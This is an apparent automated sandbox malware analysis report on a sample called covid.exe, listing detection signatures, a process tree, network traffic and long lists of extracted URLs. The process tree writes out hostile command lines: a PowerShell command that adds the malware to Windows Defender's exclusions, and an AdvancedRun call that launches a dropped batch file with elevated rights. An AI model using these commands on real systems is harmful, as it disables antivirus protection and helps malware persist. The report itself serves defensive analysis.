
Analysis Report covid.exe

Overview

General Information

Sample Name: covid.exe
Analysis ID: 393947
MD5: 99e3b458dee79b33209d39d19692ae08
SHA1: 63b68db39d6e39be7564b2fb28f1a3070b127444
SHA256: 87bb35a04c91b5005806b4893ad4dc594c8b73d228150597cde89b39f79af9b0

Most interesting Screenshot:

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Adds a directory exclusion to Windows Defender
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • covid.exe (PID: 4912 cmdline: 'C:\Users\user\Desktop\covid.exe' MD5: 99E3B458DEE79B33209D39D19692AE08)
    • AdvancedRun.exe (PID: 3192 cmdline: 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 5528 cmdline: 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /SpecialRun 4101d8 3192 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 6176 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6196 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe (PID: 6224 cmdline: 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /EXEFilename 'C:\Users\user\Desktop\covid.exe' /WindowState ''1'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe (PID: 6640 cmdline: 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /SpecialRun 4101d8 6224 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Multi AV Scanner detection for domain / URL
Source: http://mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A70E3BA9C56C3F44E5DAA4E51EAD00CB.html; Virustotal: Detection: 8%
Multi AV Scanner detection for submitted file
Source: covid.exe; Virustotal: Detection: 40%
Source: covid.exe; ReversingLabs: Detection: 34%
Machine Learning detection for sample
Source: covid.exe; Joe Sandbox ML: detected
Source: covid.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 00000005.00000000.268968190.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000013.00000002.323823436.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000015.00000002.322563501.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr
Source: global traffic; HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A70E3BA9C56C3F44E5DAA4E51EAD00CB.html HTTP/1.1 | UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 | Host: mmwrlridbhmibnr.ml | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-8D0E09CE9EC742EC93B6C666F9ACD863.html HTTP/1.1 | UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 | Host: mmwrlridbhmibnr.ml
Source: Joe Sandbox View; IP Address: 172.67.220.147
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; String found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.facebook.com (Facebook)
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; String found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.twitter.com (Twitter)
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; String found in binary or memory: <header class="mod-header" data-mod="header" data-immediate><div class="primary publication-theme-highlight"><a data-link-tracking="Header|MainLogo|Image|liverpool" id="logo" href="/">liverpool</a><a class="icon" id="hamburger" href="#">Load mobile navigation<span></span></a><nav class="primary"><section><ul data-level="1"><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Liverpool FC News" href="https://www.liverpool.com/liverpool-fc-news/">Liverpool FC News</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Latest News" href="https://www.liverpool.com/liverpool-fc-news/">Latest News</a></li><li><a data-link-tracking="Header|DropDown|Text|Transfer News" href="https://www.liverpool.com/liverpool-fc-news/transfer-news/">Transfer News</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Schedule" href="https://www.liverpool.com/schedule/">Schedule</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Premier League" href="https://www.liverpool.com/all-about/premier-league">Premier League</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li><a data-link-tracking="Header|SectionLabel|Text|Features" href="https://www.liverpool.com/liverpool-fc-news/features/">Features</a></li></ul></section></nav><profile-icon lr-custom-id="signin" lr-custom-class="header-profile-icon" lr-gtm-label="header" lr-show-account-link></profile-icon><div class="search"><button class="icon icon-search" id="search-icon" type="button" aria-label="Search"></button></div><div class="search-box hidden"><gcse:searchbox-only resultsUrl="https://www.liverpool.com/search/"></gcse:searchbox-only></div><div class="social-sites"><ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|top"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|top"></a></li></ul></div></div><nav class="secondary" data-smooth-scroll><section><ul class="click-track" data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/advertising/">Advertise with us</a></li></ul></section></nav><nav class="footer"><section><ul data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/r
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; String found in binary or memory: <meta property="og:site_name" content="Liverpool.com"><meta property="og:language" content="en"><meta property="og:type" content="article"><meta property="og:title" content="The Brewster Experience has underdelivered so far, but that will change"><meta property="og:url" content="https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763"><meta property="og:description" content="Rhian Brewster was hyped up before the start of the season, but was that fair?"><meta property="og:image" content="https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-1178657262.jpg"><meta property="og:section" content="Features"><meta property="article:tag" content="Rhian Brewster"><meta property="article:author" content="https://www.facebook.com/kristianwalsh1987/"><meta property="article:published_time" content="2019-10-30T16:00:00Z"><meta property="article:modified_time" content="2019-10-30T15:36:53Z"><meta property="article:expiration_time" content="2019-11-29T15:36:53Z"><meta property="article:section" content="Features"><meta property="article:id" content="liverpool-17172763"> equals www.facebook.com (Facebook)
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; String found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.facebook.com (Facebook)
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; String found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.twitter.com (Twitter)
Source: unknown; DNS traffic detected: queries for: mmwrlridbhmibnr.ml
Source: covid.exe; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: covid.exe; String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: powershell.exe, 0000000F.00000002.432355144.0000000002DF8000.00000004.00000020.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr; String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr; String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: covid.exe; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: covid.exe; String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: covid.exe; String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: covid.exe; String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr; String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr; String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.dr; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: covid.exe, 00000000.00000003.236314820.0000000005B22000.00000004.00000001.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?6cc8150004891
Source: covid.exe; String found in binary or memory: http://ocsp.digicert.com0C
Source: covid.exe; String found in binary or memory: http://ocsp.digicert.com0O
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr; String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000010.00000003.387988534.0000000007851000.00000004.00000001.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; String found in binary or memory: http://schema.org/BreadcrumbList
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; String found in binary or memory: http://schema.org/ListItem
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; String found in binary or memory: http://schema.org/NewsArticle
Source: powershell.exe, 0000000F.00000002.434270179.00000000049C1000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000010.00000003.387988534.0000000007851000.00000004.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: covid.exe; String found in binary or memory: http://www.digicert.com/CPS0
Source: AdvancedRun.exe, AdvancedRun.exe, 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000013.00000002.323823436.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000015.00000002.322563501.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr; String found in binary or memory: http://www.nirsoft.net/
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; String found in binary or memory: https://ads.pubmatic.com/AdServer/js/pwt/156997/3236/pwt.js
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; String found in binary or memory: https://c.amazon-adsystem.com/aax2/apstag.js
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp; String found in binary or memory: https://felix.data.tm-awx.com
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; String found in binary or memory: https://felix.data.tm-awx.com/ampconfig.json&quot;
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; String found in binary or memory: https://felix.data.tm-awx.com/felix.min.js
Source: powershell.exe, 00000010.00000003.387988534.0000000007851000.00000004.00000001.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp; String found in binary or memory: https://github.com/ded/script.js
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp; String found in binary or memory: https://i2-prod.liverpool.com
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; String found in binary or memory: https://i2-prod.liverpool.com/incoming/article17156435.ece/ALTERNATES/s615/1_GettyImages-1183794835.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; String found in binary or memory: https://i2-prod.liverpool.com/incoming/article17166876.ece/ALTERNATES/s615/0_GettyImages-1175998874.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp; String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp; String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp; String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s220b/0_Salah-Pressing.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp; String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp; String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp; String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s180/0_Curtis-10.png
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp; String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp; String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp; String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp; String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp; String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s220b/0_Salah-Goal-vs-Leeds.jp
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp; String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp; String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp; String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp; String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp; String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp; String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp; String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s180/0_GettyImages-1231353837.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp; String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-1231353837
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmp; String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s180/0_GettyImages-1304940818.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s615/1_FreeAgentPlayers.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
